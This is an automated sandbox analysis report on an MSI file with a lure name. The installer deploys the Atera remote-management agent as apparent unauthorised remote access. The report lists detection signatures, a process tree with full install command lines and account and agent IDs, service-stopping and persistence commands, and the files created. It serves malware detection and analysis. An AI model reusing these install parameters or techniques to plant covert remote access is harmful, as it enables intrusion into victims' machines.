Windows Analysis Report
TRABALHO----PROCESSO0014S55-S440000000S1.msi

Overview

General Information

Sample name: TRABALHO----PROCESSO0014S55-S440000000S1.msi
Analysis ID: 1524137
MD5: 50159e0e7acfd900e3190f860297d1e6
SHA1: d4f6302266269f2bddfaaa96625dd3d391e11e25
SHA256: 9104930a661af5e641ad911fc30c0887433713ea589e389f06cbd5bb0a7ed5ad
Tags: msiuser-Porcupine

Detection

AteraAgent
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Installs Task Scheduler Managed Wrapper
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7472 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7568 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7700 cmdline: rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7808 cmdline: rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7884 cmdline: rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7508 cmdline: rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8000 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8052 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 8080 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 8144 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 6516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 7760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AteraAgent.exe (PID: 7016 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1792 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7892 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7880 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 8112 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2508 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4008 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 7808 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 3916 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP MD5: 749C51599FBF82422791E0DF1C1E841C)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 2120 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP MD5: B50005A1A62AFA85240D1F65165856EB)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 1504 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 3920 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 8036 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8028 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 8064 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageUpgradeAgent.exe (PID: 7956 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP MD5: D11B2139D29E79D795054C3866898B7F)
      • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1468 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)
    • AgentPackageTicketing.exe (PID: 8096 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP MD5: B39264220D20A5C2807CDA3EA5F6B772)
      • conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageProgramManagement.exe (PID: 8132 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP MD5: E32856BEF4126DF5FB008E0EC9E7A3DD)
      • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageInternalPoller.exe (PID: 5456 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP MD5: 01807774F043028EC29982A62FA75941)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMarketplace.exe (PID: 6428 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP MD5: EFB4712C8713CB05EB7FE7D87A83A55A)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 7808 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP MD5: B50005A1A62AFA85240D1F65165856EB)
  • sppsvc.exe (PID: 8188 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 7736 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AgentPackageUpgradeAgent.exe (PID: 2260 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: D11B2139D29E79D795054C3866898B7F)
    • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Config.Msi\4c9994.rbs | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DF6D3CFC025FA64744.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
00000037.00000002.2103371672.000001CC12F4A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
00000037.00000002.2103371672.000001CC12F4E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000001A.00000002.2152969045.000001A8819BC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000001A.00000002.2141115637.000001A8810EF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000002C.00000002.2110035392.000001F140C40000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
22.2.AgentPackageAgentInformation.exe.26ad1de0000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
55.0.AgentPackageInternalPoller.exe.1cc122b0000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
51.0.AgentPackageTicketing.exe.24844c30000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
26.2.AteraAgent.exe.1a88220e3d8.2.raw.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

System Summary

Source: Threat created | Author: @SBousseaden (detection), Thomas Patzke (rule) | Data: EventID: 8, SourceImage: C:\Windows\System32\cscript.exe, SourceProcessId: 7808, StartAddress: CC2D6180, TargetImage: C:\Windows\SysWOW64\rundll32.exe, TargetProcessId: 7808
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\cscript.exe, SourceProcessId: 7808, StartAddress: CC2D6180, TargetImage: C:\Windows\SysWOW64\rundll32.exe, TargetProcessId: 7808
Source: Process started | Author: Michael Haag | Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4008, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 7808, ProcessName: cscript.exe
Source: Process started | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) | Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7960, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8000, ProcessName: net.exe
Source: Process started | Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7960, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8000, ProcessName: net.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 7760, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: 4c9995.rbf (copy) | ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | ReversingLabs: Detection: 26%
Source: TRABALHO----PROCESSO0014S55-S440000000S1.msi | ReversingLabs: Detection: 24%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.8% probability
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe | Code function: 37_2_00007FFB02EC4BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe | Code function: 37_2_00007FFB02EC4E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe | Code function: 37_2_00007FFB02EC4DE0 CryptReleaseContext
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebClient.dllJump to behavior
